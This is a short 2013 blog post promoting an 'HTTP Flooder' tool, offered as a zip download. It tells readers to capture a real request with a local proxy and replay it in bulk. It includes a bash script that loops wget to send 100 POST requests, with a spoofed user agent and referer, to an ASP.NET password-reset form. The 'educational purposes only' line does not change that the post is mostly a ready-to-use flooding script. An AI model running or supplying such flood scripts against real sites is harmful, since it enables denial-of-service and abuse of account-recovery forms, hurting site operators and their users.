Saturday, January 12, 2013

Lets do Some HTTP Post Flood

This tool allows you to edit and replicate HTTP parameters after the request finally leaves your browser.
Its for educational purposes only.The aim of this tool is to show the wget usage.
Can be downloaded at
https://docs.google.com/file/d/0B0EDab8sQhCCYTRvTlhFUTZwOTA/edit

File Named: HTTP Flooder v1.0 Uses WGET.zip
It Uses wget.exe located at c:\ drive, Creates an HTML file of the HTTP response at the directory where it runs.

Example Usage: Before running it,sniff the traffic with a local proxy like webscarab and copy/paste the final request data to flood.




For Linux Users,
Example of a simple bash script, will do a 100 post request

#!/bin/bash
for i in {1..100};
do
wget --user-agent=Firefox/10 --referer=https://www.vulnwebtest.com --post-data="__VIEWSTATE=%2FwEPDwULLTExMjU2MzY2MjcPZBYCAgMPZBYSAgMPDxYCHgRUZXh0BQxVc2VyIE5hbWUgOiBkZAIFDw8WBB8ABQR0ZXN0HgdFbmFibGVkaGRkAgcAPDxYCHgdWaXNpYmxlaGRkAgkPDxYCHwJoZGQCDQ8PFgIfAmdkZAIPDw8WB9B8ABQR0ZXN0HwJnZGQCEQ8PAFgIfAmdkZAITDw8WAh8CZ2RkAhUPDxYCHwJnZGRk8Nl1HK2Uc%2B9sUZwQEPNDjmgqRms%3D&__EVENTVALIDATION=%2FwEWBAK41KgrAuzRsusGAuzR9tkMArursYYIKiocz95qxVisTmMDLVdMhHxNkYk%3D&Email=test&Button=Send+Password" --no-check-certificate --no-dns-cache http://www.vulnwebtest.com/test.aspx
done